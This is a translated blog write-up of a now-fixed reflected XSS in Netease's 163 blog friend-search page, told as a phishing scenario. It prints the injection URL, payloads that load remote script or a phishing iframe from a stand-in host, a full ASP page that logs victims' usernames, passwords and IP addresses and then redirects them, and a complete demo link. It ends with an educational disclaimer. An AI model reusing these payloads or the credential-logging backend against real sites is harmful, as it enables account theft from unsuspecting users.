Author: cnryan @ http://hi.baidu.com/cnryan
(// This title is pure clickbait...!!!)
An XSS in 163 that has since been fixed. Fortunately, some screenshots were taken at the time.
The bug was discovered by Monyer of Xeye. In the "find friends" section of the Netease blog, enter the test code in the browser:
http://blog.163.com/findFriend.do?index=1&ageFrom=18&ageTo=25&gender=&province=monyer',xss:function(){alert('monyer');}(),xss2:'&selfPage=t
In fact, a URL-borne XSS like this would not pose much of a threat to an ordinary website; whether an XSS matters depends on the whole environment, and elsewhere this one would be meaningless. But this is a cross-site hole on Netease itself.
Suppose a malicious user (not me) uses this 163 bug to launch a "phishing attack". That would be terrible!
Implementation process:
function(){var s=document.createElement('script');s.src='http://www.xxx.com/xss.js';document.body.appendChild(s);}
163 filters double quotes but lets single quotes through (the single quotes in these payloads are what break out of the page's JavaScript string literal),
so an attacker can directly inject remote JavaScript code.
An iframe for phishing can also be built directly:
function(){var s=document.createElement('iframe');s.src='http://www.xxx.com/xss.htm';document.body.appendChild(s);}
When the page under http://blog.163.com... is visited, xss.htm is embedded in it at the same time.
xss.htm is a locally saved copy of the normal user login page, like this.
The submission address in xss.htm is changed to a receiving page, constructed as follows:
-------------------------------------------------------
<%
Dim getuser
Dim getpass
Dim getip
Dim mytime
Dim str
getuser = Request("user")
getpass = Request("password")
getip = Request.ServerVariables("REMOTE_ADDR")
mytime = Now()
' Append one record per submission to msg.txt next to this script (8 = ForAppending, True = create if missing)
Set fs = Server.CreateObject("Scripting.FileSystemObject")
Set file = fs.OpenTextFile(Server.MapPath("msg.txt"), 8, True)
str = "<-bof|" & mytime & "|" & getip & "|--------user:" & getuser & "&password:" & getpass & "---------|eof->"
file.WriteLine(str)
file.Close
Set file = Nothing
Set fs = Nothing
' Send the victim straight back to the real site so nothing looks wrong
Response.Write "<script>window.location='http://www.163.com'</script>"
Response.End
%>
-------------------------------------------------------
If a user without security awareness logs in on the modified page, the form collects the account and password and immediately redirects back to the normal friend-search page; the whole process is very stealthy.
The iframe cannot achieve a true "full screen" effect, but its size can be adjusted. In addition, innerText can be used to replace the text of the search results:
function(){document.getElementById('friendList').innerText='cnryan coming';}
Chinese in the URL must be percent-encoded; Netease sends Chinese as UTF-8, so if the displayed text is changed to "请登陆后使用" ("Please log in to use this"), it becomes:
%E8%AF%B7%E7%99%BB%E9%99%86%E5%90%8E%E4%BD%BF%E7%94%A8
Complete demo:
http://blog.163.com/findFriend.do?index=1&ageFrom=18&ageTo=25&gender=&province=monyer',xss:function(){document.getElementById('friendList').innerText='%E8%AF%B7%E7%99%BB%E9%99%86%E5%90%8E%E4%BD%BF%E7%94%A8';var%20s=document.createElement('iframe');s.src='http://www.baidu.com';s.height=600;s.width=1000;document.body.appendChild(s);}(),xss2:'&selfPage=t
Finally, let's look at the phishing trap.
I believe this threat is huge!
When you are happily browsing a friend's blog, you suddenly receive an email like this, and many people will click it without thinking. That is where the evil begins: on the "friend search" page you are prompted to log in before you can use it. The next step is whether you walk into the trap. I believe most users with network security awareness will not be easily taken in.
But you must know that phishers are an evil lot.
Netease's user base is enormous. Even if only 1% of its users open such an anonymous email (of course you can be fooled too), only 1% of those visit the address, and in the end only 1% of those actually log in, the number of affected users is still huge.
---------------------------------------------------------
Netease Anti-xss filters are very powerful.
Today I tested the XSS in the Netease blog module and found that it has been fixed.
Statement:
The above examples are for educational purposes only.
Please do not use any of the above code, techniques or methods to do anything illegal; I take no responsibility for it. Let's give the Chinese Internet world a clean environment.
It's all done!